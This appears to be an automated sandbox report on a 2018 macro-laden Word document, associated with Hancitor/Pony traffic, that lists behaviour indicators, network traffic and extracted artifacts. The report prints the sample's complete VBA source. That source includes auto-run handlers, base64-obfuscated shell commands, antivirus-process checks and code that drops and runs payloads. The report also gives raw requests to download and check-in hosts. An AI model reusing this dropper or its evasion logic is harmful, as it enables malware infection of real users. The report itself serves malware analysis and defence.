2018-12-10-downloaded-Word-doc-with-macro-for-emotet.doc
This report was generated from a file or URL submitted to this webservice on December 10th 2018 19:26:21 (UTC) with the action script "Heavy Anti-Evasion".
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1, Office 2010 v14.0.4
Report generated by Falcon Sandbox v8.20 © Hybrid Analysis
Incident Response
Risk Assessment
- Spyware
  - Hooks API calls
  - POSTs files to a webserver
- Fingerprint
  - Tries to identify its external IP address
- Evasive
  - Checks network status using ping
  - Detected document macro trying to fingerprint/evade the analysis environment
  - Uses ping excessively (often used to bypass analysis)
- Network Behavior
  - Contacts 6 domains and 6 hosts.
MITRE ATT&CK™ Techniques Detection
Indicators
Not all malicious and suspicious indicators are displayed.
Malicious Indicators 16
Anti-Reverse Engineering
- Uses ping excessively (often used to bypass analysis)
  - details: Process "PING.EXE" with commandline "ping localhost -n 100"
  - source: Monitored Target
  - relevance: 7/10
Environment Awareness
- Detected document macro trying to fingerprint/evade the analysis environment
  - details: Document contains auto-execute macro and tries to obtain external IP/ISP/host information
  - source: Indicator Combinations
  - relevance: 10/10
  - ATT&CK ID: T1063
External Systems
- Detected Suricata Alert
  - details:
    Detected alert "ET POLICY External IP Lookup api.ipify.org" (SID: 2021997, Rev: 3, Severity: 1) categorized as "Potential Corporate Privacy Violation"
    Detected alert "ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin" (SID: 2819978, Rev: 5, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
    Detected alert "CrowdStrike Hancitor POST Request" (SID: 181610701, Rev: 20160930, Severity: 1) categorized as "A Network Trojan was detected"
    Detected alert "ET TROJAN Fareit/Pony Downloader Checkin 2" (SID: 2014411, Rev: 11, Severity: 1) categorized as "A Network Trojan was detected" (Backdoor, ransomware, trojans, etc.)
    Detected alert "CrowdStrike Pony Request" (SID: 181708101, Rev: 20170522, Severity: 1) categorized as "A Network Trojan was detected"
    Detected alert "ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1)" (SID: 2824549, Rev: 2, Severity: 1) categorized as "A Network Trojan was detected" (Phishing, Exploit Kits)
  - source: Suricata Alerts
  - relevance: 10/10
- Sample was identified as malicious by a large number of Antivirus engines
  - details: 29/62 Antivirus vendors marked sample as malicious (46% detection rate)
  - source: External System
  - relevance: 10/10
- Sample was identified as malicious by at least one Antivirus engine
  - details: 29/62 Antivirus vendors marked sample as malicious (46% detection rate)
  - source: External System
  - relevance: 8/10
General
- Document spawns new processes
  - details: Document spawned a new process (macro present)
  - source: Indicator Combinations
  - relevance: 7/10
- GETs files from a webserver
  - details:
"GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache"
"GET /wp-includes/1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: itssprout.com
Cache-Control: no-cache"
"GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: itssprout.com
Cache-Control: no-cache
Connection: Keep-Alive"
"GET /wp-content/themes/twentyfourteen/1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: apathtoinnerpeace.com
Cache-Control: no-cache"
"GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: apathtoinnerpeace.com
Cache-Control: no-cache
Connection: Keep-Alive"
"GET /wp-includes/customize/1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: hk3fitness.com
Cache-Control: no-cache"
"GET /cgi-sys/suspendedpage.cgi HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: hk3fitness.com
Cache-Control: no-cache
Connection: Keep-Alive"
"GET /modules/DesignManager/1 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sycamoreelitefitness.com
Cache-Control: no-cache"
"GET /wp-includes/2 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: itssprout.com
Cache-Control: no-cache"
"GET /wp-content/themes/twentyfourteen/2 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: apathtoinnerpeace.com
Cache-Control: no-cache"
  - source: Network Traffic
  - relevance: 10/10
- The analysis extracted a file that was identified as malicious
  - details: 15/69 Antivirus vendors marked dropped file "extra_embedded_0.exe.bin" as malicious (classified as "DangerousObject.Multi" with 21% detection rate)
  - source: Binary File
  - relevance: 10/10
Network Related
- Malicious artifacts seen in the context of a contacted host
  - details:
Found malicious artifacts related to "54.204.36.156": ...
URL: http://api.ipify.org/ (AV positives: 1/70 scanned on 12/07/2018 01:58:48)
URL: http://api.ipify.org/?format=jsonp&callback=jQuery111203746056614909321_1544045586789&_=1544045586790 (AV positives: 1/70 scanned on 12/06/2018 17:33:25)
File SHA256: 3159ea711927cc57efcb9e8421097a06b073469a16a7797270cf9a424925ea28 (Date: 12/10/2018 14:04:18)
File SHA256: 29025295e50125251ffed2456706f58f4db08f86a1c30dc9e90b87a1d8717b56 (Date: 12/10/2018 04:48:27)
File SHA256: d28e09fa1b7eaae44be9e2ceb5d7e70268994e905d0ddb3ef6350f6e6b8c8f6e (AV positives: 14/70 scanned on 12/08/2018 17:02:00)
File SHA256: c24ad8e67355cc7992a8b1854f38a16712846af7ac3099794609d7f731ffd944 (AV positives: 35/70 scanned on 12/08/2018 03:31:12)
File SHA256: bf2ff9b64b4da1c401e365500ce55ca32c1d708ad5f2366fe93027df3e9d8fb2 (AV positives: 48/69 scanned on 12/07/2018 05:17:25)
File SHA256: e5ceeb1f78b683a3efecf77e2d5b8251b04281cd12ebfc374d36cfb62a92d657 (AV positives: 45/70 scanned on 12/07/2018 13:53:47)
File SHA256: 9617dd0af3b935fda4be31beeaeee45dac40d33a36b92e70a3fa0e0407e1836e (AV positives: 55/69 scanned on 12/06/2018 22:39:33)
Found malicious artifacts related to "192.232.216.139": ...
URL: http://itssprout.com/wp-includes/3 (AV positives: 3/69 scanned on 12/10/2018 15:38:19)
URL: http://itssprout.com/wp-includes/1 (AV positives: 2/69 scanned on 12/10/2018 15:28:42)
URL: http://lifewithoutsocialmedia.com/plugin/installment/log/linkedin/Linkedin/SignIn.php (AV positives: 6/66 scanned on 12/08/2018 22:14:38)
URL: http://lifewithoutsocialmedia.com/wp-includes/log/Made-in-China.htm (AV positives: 5/66 scanned on 12/08/2018 06:10:20)
URL: http://curtispattee.com/wp-houses/landing.php (AV positives: 7/66 scanned on 12/08/2018 01:46:17)
File SHA256: 0ff0b7fcb090c65d0bdcb2af4bbd2c30f33356b3ce9b117186fa20391ef840a3 (AV positives: 14/59 scanned on 10/06/2018 13:10:24)
File SHA256: 6a67d85a3740ab6e955afd67cc06d70b48e8b94551b689434b79262256c2843a (AV positives: 1/59 scanned on 09/11/2018 22:36:27)
File SHA256: 1fd8f6e5b0f4ea03d3e6c80a2e236825ec1076a1b4c684b4f2174aa97d71a340 (AV positives: 2/71 scanned on 01/12/2018 21:36:19)
File SHA256: c0f716d986545de519029f1ae243d200835ba25e82ba1911617074f1bb3ffe16 (AV positives: 7/60 scanned on 12/28/2017 00:40:22)
File SHA256: 98461340a03e38489be1d94d658fed973f09572733a0077ba64ed69524104391 (AV positives: 7/59 scanned on 12/27/2017 13:41:18)
Found malicious artifacts related to "192.185.226.114": ...
URL: http://apathtoinnerpeace.com/ (AV positives: 2/69 scanned on 12/10/2018 17:13:55)
URL: http://apathtoinnerpeace.com/wp-content/themes/twentyfourteen/3 (AV positives: 3/69 scanned on 12/10/2018 15:37:47)
URL: http://sapsters.com/verification/login/ (AV positives: 4/66 scanned on 11/25/2018 10:04:34)
URL: http://sapsters.com/ (AV positives: 4/66 scanned on 11/25/2018 09:46:43)
URL: http://sapsters.com/verification/login (AV positives: 5/66 scanned on 11/25/2018 09:45:17)
File SHA256: 0ff0b7fcb090c65d0bdcb2af4bbd2c30f33356b3ce9b117186fa20391ef840a3 (AV positives: 5/70 scanned on 12/10/2018 10:00:07)
File SHA256: 7e22921d6da964161efd526eb4f20885636692270c9ea8cad4bd35b7d5c91fae (AV positives: 1/59 scanned on 05/22/2018 21:56:48)
File SHA256: 0ee05882414e66190bdad594144843bcc8e45c48accc5f35091c5220ffea1c4d (AV positives: 1/69 scanned on 02/03/2018 08:22:58)
File SHA256: 632c5ad13e9055b1b3df787155f6f337dc78d6dad78e82cc9c8f3c472cf843bf (AV positives: 21/59 scanned on 09/05/2017 16:05:05)
File SHA256: 206e7c8b25977ae8ef62e77f7d313f6da86dcd5c3a7f2718b78f1e9fc13af786 (AV positives: 22/55 scanned on 07/01/2017 19:43:45)
Found malicious artifacts related to "192.232.223.6": ...
URL: http://hk3fitness.com/wp-includes/customize/2 (AV positives: 2/66 scanned on 12/10/2018 15:51:55)
URL: http://hk3fitness.com/wp-includes/customize/3 (AV positives: 3/69 scanned on 12/10/2018 15:37:15)
URL: http://hk3fitness.com/wp-includes/customize/1 (AV positives: 2/69 scanned on 12/10/2018 15:28:50)
URL: http://facebook.c0m.us/ (AV positives: 4/66 scanned on 12/09/2018 14:52:42)
URL: http://maximaproducts.com/ (AV positives: 1/66 scanned on 11/26/2018 03:43:31)
File SHA256: 0ff0b7fcb090c65d0bdcb2af4bbd2c30f33356b3ce9b117186fa20391ef840a3 (AV positives: 5/57 scanned on 12/10/2018 15:51:59)
File SHA256: 6a67d85a3740ab6e955afd67cc06d70b48e8b94551b689434b79262256c2843a (AV positives: 1/58 scanned on 10/06/2018 06:41:22)
File SHA256: 77795c8a3c5a8ff8129cb4db828828c53a590f93583fcfb0b1112a4e670c97d4 (AV positives: 1/58 scanned on 05/20/2018 08:54:26)
File SHA256: 1ecd310e4d695de451b10553e5826f3f94b576d670cfeddfa8e44184e8d5c92d (AV positives: 22/60 scanned on 05/17/2018 12:00:43)
File SHA256: e4dc8df8d9ad03364e5d6f7f047ae3bc3506ebe25299c3d52b6ed9482fc61db1 (AV positives: 23/54 scanned on 01/22/2017 17:21:17)
Found malicious artifacts related to "209.188.93.46": ...
URL: http://sycamoreelitefitness.com/modules/DesignManager/1 (AV positives: 4/69 scanned on 12/10/2018 16:53:32)
URL: http://sycamoreelitefitness.com/modules/DesignManager/3 (AV positives: 4/69 scanned on 12/10/2018 15:36:42)
URL: http://gotdeerdown.com/.well-known/acme-challenge/myfibank/account/alert.php (AV positives: 11/66 scanned on 12/10/2018 14:20:03)
URL: https://gotdeerdown.com/.well-known/acme-challenge/myfibank/account/ (AV positives: 13/70 scanned on 12/10/2018 13:18:47)
URL: http://gotdeerdown.com/.well-known/acme-challenge/myfibank/account (AV positives: 9/66 scanned on 12/10/2018 12:46:14)
File SHA256: c36dc9b569912514f8a19d08c47c30359de7fbd5406535c2247de5a532f4d7f1 (AV positives: 1/57 scanned on 12/06/2018 06:05:40)
File SHA256: 8a482f2271a42c5f54c96e816a84340a6f2357a5b81f927d07d00788f5140a41 (AV positives: 1/72 scanned on 12/02/2018 16:50:24)
File SHA256: 70a6e1ce252450fea32f008e3916ab173413a364f5b7b14b734d0c7838859b96 (AV positives: 1/59 scanned on 10/18/2018 19:16:11)
File SHA256: fdf900267092bc67bd7786b86c462e69f9ed52bed838809b6ba28b298be879f6 (AV positives: 1/58 scanned on 09/03/2018 22:21:52)
File SHA256: 50ee7f9c8783ddd975938d6d7316340c08da4d52579c1914d2888fd7798c26ee (AV positives: 3/60 scanned on 07/17/2018 08:00:54)
  - source: Network Traffic
  - relevance: 10/10
- Tries to identify its external IP address
  - details: "api.ipify.org"
  - source: Network Traffic
  - relevance: 6/10
Unusual Characteristics
- Contains embedded VBA macros with keywords that indicate auto-execute behavior
  - details:
    Found keyword "Document_Open" which indicates: "Runs when the Word or Publisher document is opened"
    Found keyword "Document_Close" which indicates: "Runs when the Word document is closed"
  - source: Static Parser
  - relevance: 10/10
  - ATT&CK ID: T1137
- Document analysis contacts a domain
  - details: Often seen on documents with macro droppers, embedded files or exploits
  - source: Indicator Combinations
  - relevance: 3/10
Hiding 4 Malicious Indicators
Suspicious Indicators 16
External Systems
- Found an IP/URL artifact that was identified as malicious by at least one reputation engine
  - details:
    1/66 reputation engines marked "http://api.ipify.org" as malicious (1% detection rate)
    1/68 reputation engines marked "http://sycamoreelitefitness.com" as malicious (1% detection rate)
    2/69 reputation engines marked "http://apathtoinnerpeace.com" as malicious (2% detection rate)
  - source: External System
  - relevance: 10/10
General
- POSTs files to a webserver
  - details:
"POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: henmerecrob.com
Content-Length: 112
Cache-Control: no-cache" with no payload
"POST /mlu/forum.php HTTP/1.0
Host: henmerecrob.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 206
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" with no payload
  - source: Network Traffic
  - relevance: 5/10
Installation/Persistence
- Drops executable files
  - details: "extra_embedded_0.exe.bin" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
  - source: Binary File
  - relevance: 10/10
- Writes data to a remote process
  - details:
    "cmd.exe" wrote 32 bytes to a remote process "%WINDIR%\System32\PING.EXE" (Handle: 84)
    "cmd.exe" wrote 52 bytes to a remote process "%WINDIR%\System32\PING.EXE" (Handle: 84)
    "cmd.exe" wrote 4 bytes to a remote process "%WINDIR%\System32\PING.EXE" (Handle: 84)
  - source: API Call
  - relevance: 6/10
  - ATT&CK ID: T1055
Network Related
- Sends traffic on typical HTTP outbound port, but without HTTP header
  - details:
    TCP traffic to 54.204.36.156 on port 80 is sent without HTTP header
    TCP traffic to 185.244.149.11 on port 80 is sent without HTTP header
    TCP traffic to 192.232.216.139 on port 80 is sent without HTTP header
    TCP traffic to 192.185.226.114 on port 80 is sent without HTTP header
    TCP traffic to 192.232.223.6 on port 80 is sent without HTTP header
    TCP traffic to 209.188.93.46 on port 80 is sent without HTTP header
  - source: Network Traffic
  - relevance: 5/10
- Uses a User Agent typical for browsers, although no browser was ever launched
  - details: Found user agent(s): Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  - source: Network Traffic
  - relevance: 10/10
Spyware/Information Retrieval
- Checks network status using ping
  - details: Process "PING.EXE" with commandline "ping localhost -n 100"
  - source: Monitored Target
  - relevance: 5/10
  - ATT&CK ID: T1018
System Security
- Hooks API calls
  - details:
    "SysFreeString@OLEAUT32.DLL" in "WINWORD.EXE"
    "SysAllocStringByteLen@OLEAUT32.DLL" in "WINWORD.EXE"
    "VariantChangeType@OLEAUT32.DLL" in "WINWORD.EXE"
    "OleLoadFromStream@OLE32.DLL" in "WINWORD.EXE"
    "VariantClear@OLEAUT32.DLL" in "WINWORD.EXE"
  - source: Hook Detection
  - relevance: 10/10
  - ATT&CK ID: T1179
- Modifies proxy settings
  - details:
    "extra_embedded_0.exe" (Access type: "SETVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYENABLE"; Value: "00000000")
    "extra_embedded_0.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYSERVER")
    "extra_embedded_0.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS"; Key: "PROXYOVERRIDE")
    "extra_embedded_0.exe" (Access type: "DELETEVAL"; Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
    "extra_embedded_0.exe" (Access type: "DELETEVAL"; Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP"; Key: "PROXYBYPASS")
  - source: Registry Access
  - relevance: 10/10
  - ATT&CK ID: T1112
Unusual Characteristics
- Contains embedded VBA macros with suspicious keywords
  - details:
    Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
    Found suspicious keyword "vbHide" which indicates: "May run an executable file or a system command"
    Found suspicious keyword "Run" which indicates: "May run an executable file or a system command"
    Found suspicious keyword "Output" which indicates: "May write to a file (if combined with Open)"
    Found suspicious keyword "Print #" which indicates: "May write to a file (if combined with Open)"
    Found suspicious keyword "Environ" which indicates: "May read system environment variables"
    Found suspicious keyword "Open" which indicates: "May open a file"
    Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
    Found suspicious keyword "CopyFile" which indicates: "May copy a file"
  - source: Static Parser
  - relevance: 10/10
- Installs hooks/patches the running process
  - details:
"WINWORD.EXE" wrote bytes "10661eaa" to virtual address "0x2F681B94" (part of module "WINWORD.EXE")
"WINWORD.EXE" wrote bytes "e99a5431f1" to virtual address "0x76A63E59" ("SysFreeString@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "e99e481bf1" to virtual address "0x76B93D01" ("SetUnhandledExceptionFilter@KERNEL32.DLL")
"WINWORD.EXE" wrote bytes "b84013966bffe0" to virtual address "0x75591248" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "e9603332f1" to virtual address "0x76A64731" ("SysAllocStringByteLen@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "f8110000" to virtual address "0x755912CC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "f8115975" to virtual address "0x755A83C4" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "f8115975" to virtual address "0x755A834C" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "b8b015966bffe0" to virtual address "0x755911F8" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48125975" to virtual address "0x755A83C0" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48125975" to virtual address "0x755A8348" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "e9239934f1" to virtual address "0x76A65DEE" ("VariantChangeType@OLEAUT32.DLL")
"WINWORD.EXE" wrote bytes "48120000" to virtual address "0x7559139C" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48125975" to virtual address "0x755A83DC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "68130000" to virtual address "0x75A61680" (part of module "WS2_32.DLL")
"WINWORD.EXE" wrote bytes "48120000" to virtual address "0x755912DC" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "48125975" to virtual address "0x755A8364" (part of module "SSPICLI.DLL")
"WINWORD.EXE" wrote bytes "4053597758585a77186a5a77653c5b770000000000bfb8760000000056ccb876000000007ccab87600000000376873756a2c5b77d62d5b7700000000206973750000000029a6b87600000000a48d737500000000f70eb87600000000" to virtual address "0x76911000" (part of module "NSI.DLL")
"WINWORD.EXE" wrote bytes "c4cab87680bbb876aa6eb9769fbbb87608bbb87646ceb8766138b976de2fb976d0d9b8760000000017792c774f912c777f6f2c77f4f72c7711f72c77f2832c77857e2c7700000000" to virtual address "0x6F301000" (part of module "MSIMG32.DLL")
"WINWORD.EXE" wrote bytes "b83012966bffe0" to virtual address "0x75A61368" (part of module "WS2_32.DLL")
  - source: Hook Detection
  - relevance: 10/10
  - ATT&CK ID: T1179
Hiding 5 Suspicious Indicators
Informative 15
Environment Awareness
- Possibly tries to detect the presence of a debugger
  - details: GetProcessHeap@KERNEL32.DLL from extra_embedded_0.exe (PID: 2768)
  - source: Hybrid Analysis Technology
  - relevance: 1/10
General
- Contacts domains
  - details:
    "api.ipify.org"
    "henmerecrob.com"
    "itssprout.com"
    "apathtoinnerpeace.com"
    "hk3fitness.com"
    "sycamoreelitefitness.com"
  - source: Network Traffic
  - relevance: 1/10
- Contacts server
  - details:
    "54.204.36.156:80"
    "185.244.149.11:80"
    "192.232.216.139:80"
    "192.185.226.114:80"
    "192.232.223.6:80"
    "209.188.93.46:80"
  - source: Network Traffic
  - relevance: 1/10
- Contains embedded VBA macros
  - details:
File "ThisDocument.cls" (Streampath: "VBA/ThisDocument") has code: "Private Sub Document_Open()
On Error Resume Next
Selection.MoveDown Unit:=wdScreen, Count:=7
Selection.MoveDown Unit:=wdScreen, Count:=7
Selection.MoveRight Unit:=wdCharacter, Count:=24
Selection.TypeBackspace
Selection.Copy
Call sdfsdf
Call cek
Call killo
End Sub
Private Sub Document_Close()
Call closee
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function"
File "bbbbbbb.bas" (Streampath: "VBA/bbbbbbb") has code: "Sub killo()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
Application.Quit
End Sub"
File "eeeeee.bas" (Streampath: "VBA/eeeeee") has code: "Sub closee()
Dim jddsdfda As String
jddsdfda = UserForm5.TextBox1.Text
Dim yrtfdsad, vcxvxczcv
Dim mbbmbdf
Dim nuchevi
nuchevi = UserForm6.TextBox1.Text
Set wsh = VBA.CreateObject(UserForm1.TextBox1.Text & UserForm4.TextBox1.Text & UserForm2.TextBox1.Text)
Dim lhjxvcvx
lhjxvcvx = StrConv(DecodeBase64(UserForm3.TextBox1.Text), vbUnicode)
Dim kkkdds
kkkdds = StrConv(DecodeBase64("PGh0bWw+DQo8aGVhZD4NCiA8U0NSSVBUIExBTkdVQUdFPSJWQlNjcmlwdCI+DQogICAgICAgICAgV2luZG93Lk1vdmVUbyAtMzIwMDAsIC0zMjAwMA0KICAgICA8L1NDUklQVD4NCiAgICA8dGl0bGU+QXBwbGljYXRpb24gRXhlY3V0ZXI8L3RpdGxlPg0KICAgIDxIVEE6QVBQTElDQVRJT04gSUQ9Im9NeUFwcCIgDQogICAgICAgIEFQUExJQ0FUSU9OTkFNRT0iQXBwbGljYXRpb24gRXhlY3V0ZXIiIA0KICAgICAgICBCT1JERVI9Im5vIg0KICAgICAgICBDQVBUSU9OPSJubyINCiAgICAgICAgU0hPV0lOVEFTS0JBUj0ieWVzIg0KICAgICAgICBTSU5HTEVJTlNUQU5DRT0ieWVzIg0KICAgICAgICBTWVNNRU5VPSJ5ZXMiDQogICAgICAgIFNDUk9MTD0ibm8i"), vbUnicode)
If True = IsExeRunning(jddsdfda) Then
Open Environ("Temp") & "\1.hta" For Output As #1
Print #1, kkkdds
Print #1, lhjxvcvx
Close #1
ChDir Environ("Temp")
wsh.Run Environ("Temp") & "\1.hta", 0, False
Exit Sub
End If
If True = IsExeRunning("PS" & "UAM" & "ain" & nuchevi) Then
Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide
Exit Sub
End If
If True = IsExeRunning("n360" & nuchevi) Then
Call sla(1)
Exit Sub
End If
If True = IsExeRunning("PccNT" & nuchevi) Then
Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide
Exit Sub
End If
If True = IsExeRunning("uiSeAgnt" & nuchevi) Then
Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide
Exit Sub
End If
If True = IsExeRunning("mbam" & nuchevi) Then
Open Environ("Temp") & "\1s.bat" For Output As #1
Print #1, StrConv(DecodeBase64("cGluZyBsb2NhbGhvc3QgLW4gNjA="), vbUnicode), vbHide
Print #1, StrConv(DecodeBase64("c3RhcnQgJXRlbXAlXDYucGlm"), vbUnicode), vbHide
Close
Shell Environ("Temp") & "\1s.bat", vbHide
Exit Sub
End If
If True = IsExeRunning("mbamtray" & nuchevi) Then
Open Environ("Temp") & "\1s.bat" For Output As #1
Print #1, StrConv(DecodeBase64("cGluZyBsb2NhbGhvc3QgLW4gNjA="), vbUnicode), vbHide
Print #1, StrConv(DecodeBase64("c3RhcnQgJXRlbXAlXDYucGlm"), vbUnicode), vbHide
Close
Shell Environ("Temp") & "\1s.bat", vbHide
Exit Sub
End If
Shell StrConv(DecodeBase64("Y21kLmV4ZSAvYyAgcGluZyBsb2NhbGhvc3QgLW4gMTAwICYmIA=="), vbUnicode) & Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("X" & "DYuc" & "Glm"), vbUnicode), vbHide
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function
Public Function IsExeRunning(sExeName As String, Optional sComputer As String = ".") As Boolean
Dim objProcesses As Object
Set objProcesses = GetObject("w" & "in" & "mg" & "mts" & ":{impersonationLevel=impersonate}!\\" & sComputer & "\root\cimv2").ExecQuery("SELECT * FROM Win32_Process WHERE Name = '" & sExeName & "'")
If objProcesses.Count <> 0 Then IsExeRunning = True
End Function
Sub sla(num)
Select Case num
Case 1
Shell Environ(StrConv(DecodeBase64("VGVtcA=="), vbUnicode)) & StrConv(DecodeBase64("XDYuZXhl"), vbUnicode), vbHide
Case Else
End Select
End Sub"
File "Aaaaaa.bas" (Streampath: "VBA/Aaaaaa") has code: "Sub cek()
Set D = New DataObject
D.SetText " "
D.PutInClipboard
Selection.MoveUp Unit:=wdScreen, Count:=7
Selection.MoveUp Unit:=wdScreen, Count:=7
Selection.MoveLeft Unit:=wdCharacter, Count:=13
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", 3, t)
End Sub"
File "cccccc.bas" (Streampath: "VBA/cccccc") has code: "Sub fadf()
Dim pl, kk
kk = ".com"
pl = "L" & kk
Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")
FSO.copyfile Source:="6" & pl, Destination:="6" & ".pif"
End Sub
Sub sdfsdf()
ChDir Environ("Temp")
Call kklk
Call fadf
Selection.TypeBackspace
End Sub"
File "UserForm3.frm" (Streampath: "VBA/UserForm3") has code: ""
File "UserForm1.frm" (Streampath: "VBA/UserForm1") has code: ""
File "ddddd.bas" (Streampath: "VBA/ddddd") has code: "Sub kklk()
ChDir Environ("Temp")
Dim kk, lll, jgf, tyretw, gdfsfsa
jgf = StrConv(DecodeBase64("ZXhl"), vbUnicode)
kk = ".com"
lll = "6"
Dim FSO As Object
Set FSO = CreateObject("scripting.filesystemobject")
FSO.copyfile Source:="6L" & kk, Destination:=lll & "." & jgf
End Sub
Private Function DecodeBase64(ByVal strData As String) As Byte()
Dim objXML As MSXML2.DOMDocument
Dim objNode As MSXML2.IXMLDOMElement
Set objXML = New MSXML2.DOMDocument
Set objNode = objXML.createElement("b64")
objNode.dataType = "bin.base64"
objNode.Text = strData
DecodeBase64 = objNode.nodeTypedValue
Set objNode = Nothing
Set objXML = Nothing
End Function"
File "UserForm2.frm" (Streampath: "VBA/UserForm2") has code: ""
File "UserForm4.frm" (Streampath: "VBA/UserForm4") has code: ""
File "UserForm5.frm" (Streampath: "VBA/UserForm5") has code: ""
File "UserForm6.frm" (Streampath: "VBA/UserForm6") has code: ""
  - source: Static Parser
  - relevance: 10/10
- Creates a writable file in a temporary directory
  - details:
    "WINWORD.EXE" created file "%TEMP%\~DF9C95422EEF3A26C8.TMP"
    "WINWORD.EXE" created file "%TEMP%\Word8.0\MSForms.exd"
  - source: API Call
  - relevance: 1/10
- Creates mutants
  - details:
    "\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
    "\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-61684"
    "\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-61684"
    "\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
    "\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
    "\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
    "\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
    "\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
